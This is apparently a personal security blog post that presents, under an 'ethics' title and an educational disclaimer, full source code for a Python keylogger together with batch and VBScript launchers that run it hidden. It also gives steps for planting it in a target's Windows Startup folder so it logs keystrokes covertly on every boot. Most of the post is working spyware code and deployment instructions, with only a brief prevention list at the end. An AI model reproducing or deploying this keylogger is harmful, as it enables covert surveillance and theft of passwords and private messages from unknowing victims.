The Ethics of Keyloggers – Everything you need to know

In this blog, I’ll be explaining about a keylogger that I’ve created using Python. I’ll be explaining the full Python code in details and will also show how it works and what all implementations can be done in that tool. So let’s get started.

Keylogger

Keyloggers are tools that hackers use to spy on their targets. Generally, it captures each and every keystroke made by the target and saves it in a file locally or sends it to the attacker.

There are generally two types of keyloggers: hardware-based keyloggers and software-based keyloggers.

Hardware keylogger: It is a hardware device that looks similar to a USB drive and sends captured keystrokes to the attacker, or even stores the captured keystrokes locally.

Software Keylogger is a malicious code written with an evil mindset to steal the target’s keystrokes; the attacker sends these malicious files to the victim via phishing or any other type of social engineering. The attacker has two options for obtaining the captured keystrokes in this case: sending them via email or storing them locally. 

Disclaimer:

This blog & tool is made for Educational purpose only. Don’t use it for ILLEGAL Activities. You are responsible for your Actions.

Python-Keylogger

The keylogger I’m going to discuss was created in Python, which stores all the keystrokes locally in a text file named keylogger.txt, with proper timings of keystrokes mentioned. The attacker needs to run the script.vbs file, which will trigger both .py and.bat files to run the keylogger. It will then run a keylogger in the background without the knowledge of the target.

Files we need to create:

• keylogger.pyw
• script.vbs
• script.bat

Get all the files in my GitHub repository ; this is just version 1.0.0; more updates will come soon.

Explaining the code

keylogger.pyw

So, first, make a file called keylogger.pyw. If you haven’t noticed, I used .pyw instead of.py for the python extension because .pyw files are used in Windows to indicate a script that needs to be run using pythonw.exe instead of python.exe to prevent a DOS console from popping up and displaying the output, so we can basically do and run anything on our target computer without him or her noticing it. 

Now I’ll be explaining the code in parts. The full code can be found here.

The required libraries:

from pynput.keyboard import Key, Listener
from datetime import datetime

To run the keylogger we need to install the above mentioned libraries. We need pynput library to control and monitor input devices, like keyboard and mouse. Then we need to install datetime library to give a proper date and timing to the input made by the target, and store it on a record file.

Timestamp:

with open("keylogger.txt", "a") as f:
    f.write("TimeStamp"+(str(datetime.now()))[:-7]+":\n")
    f.write("\n")

This code opens the “keylogger.txt” file in append mode and writes a timestamp to the file. The timestamp is created using the datetime.now function, which returns the current date and time. The timestamp is then converted to a string, and some characters are removed using string slicing. The resulting string is then written to the file, followed by a newline character.

The timestamp is being written to the file so that you can know when each keylogger logging session took place.

Reading function:

def on_press(key):
    global count, keys
    keys.append(key)
    count += 1
    if count >= 5:
        count = 0
        write_file(keys)
        keys = []


def on_release(key):
    if key == Key.esc:
        return False

This code defines two event handlers for the keyboard module. The on_press function is called when a key is pressed, and the on_release function is called when a key is released.

The on_press function appends the key that was pressed to a list called keys, increments a count variable, and then checks if count is greater than or equal to 5. If it is, it resets the count to 0, calls a function called write_file with the keys list as an argument, and resets the keys list to an empty list.

The on_release function checks if the key that was released is the Esc key. If it is, the function returns False, which will stop the keyboard listener.

Writing function:

def write_file(keys):
    with open("keylogger.txt", "a") as f:
        for idx, key in enumerate(keys):
            k = str(key).replace("'", "")
            if k.find("space") > 0 and k.find("backspace") == -1:
                f.write("\n")
            elif k.find("Key") == -1:
                f.write(k)

The write_file function writes the keys in the keys list to a file called “keylogger.txt” in append mode. It iterates over the keys list and performs some string manipulation on each key before writing it to the file.

First, it calls the replace method on the string representation of the key and replaces any single quotes with an empty string. This is done to remove the single quotes that appear around some of the key names.

Next, it checks if the string “space” appears in the key name and the string “backspace” does not. If both of these conditions are true, it writes a newline character to the file. Otherwise, it checks if the string “Key” does not appear in the key name. If this is the case, it writes the key name to the file.

Overall, this function is used to process the keys in the keys list and write them to the file in a specific format.

Creating Listener:

if __name__ == "__main__":
    with Listener(
            on_press=on_press,
            on_release=on_release) as listener:
        listener.join()

    with open("keylogger.txt", "a") as f:
        f.write("\n\n")
        f.write(
            "------------------------------------------------------------------------------")
        f.write("\n\n")

This code sets up a Listener from the keyboard module, which will call the on_press and on_release event handlers when a key is pressed or released, respectively. The join method is called on the listener to start it, and it will run until the Esc key is pressed, at which point the on_release event handler will return False, stopping the listener.

After the listener has stopped, the code opens the “keylogger.txt” file in append mode and writes a newline and some dashes to the file. This is likely used as a separator between different logging sessions.

Now that the main Python file has been created, we need two more files to support it. So first we create a batch file (.bat) and then a VBScript file (.vbs).

Batch file (.bat): A batch file is a script file in DOS, OS/2, and Microsoft Windows. It consists of a series of commands to be executed by the command-line interpreter and is stored in a plain text file.

VBScript (.vbs): VBScript is an Active Scripting language developed by Microsoft that is modelled on Visual Basic.

script.bat

@ECHO OFF

C:\Users\.....\ # Write the address of python here.
%CD%\keylogger.pyw %*

This script.bat is a batch file for Windows that runs a Python script called “keylogger.pyw” from the current directory (denoted by %CD%).

The @ECHO OFF command at the top of the file prevents the command from being displayed in the command prompt as it is being executed.

The line C:\Users\.....\ is a placeholder for the address of the Python executable on your system. You’ll need to replace ..... with the actual address of the Python executable on your computer.

The %* at the end of the line is a batch file parameter that passes all of the arguments given to the batch file to the Python script.

This batch file can be run by double-clicking it or by entering script.bat at the command prompt.

script.vbs

CreateObject("Wscript.Shell").Run "script.bat", 0, True

This code creates an instance of the Wscript.Shell object and runs a batch file called “script.bat” using the Run method. The 0 argument specifies that the script should be run in a minimized window, and the True argument specifies that the script should be run asynchronously (meaning that the script will run in the background and the user can continue to interact with the system while the script is running).

---

So, now that I’ve gone over all three necessary files, how do you use them?

The use is quite simple; to run the keylogger locally, you just need to open the script.vbs file.

Now, if you are trying to send it to someone and want to record the keystrokes, you will have to follow the steps below:

• Firstly, create a shortcut of the script.vbs file.
• Cut (Ctrl + X) that shortcut file.
• Now press Win+R, which will open Run; type shell:startup and press the Enter button.
• It will open the Startup folder.
• Now just paste that shortcut file (script.vbs) in that startup directory.

Now, whenever the target starts the system, your keylogger will automatically start and record the keystrokes.

More updates to the keylogger will come very soon, and they will include features like sending the files to the attacker and not saving locally, recording the target’s microphone, and also taking real time screenshots at a fixed time interval.

---

How to prevent keylogging?

• Make sure you do not download or run any unknown files.
• Do not download or run any cracked software;
  it has been found that most keyloggers are present in cracked software.
• Make sure you have antivirus and a firewall installed on your system.
• Keep updating your system whenever any patches are officially released.

Don’t be safety blinded, be safely minded!!

With ♥ VirusZzWarning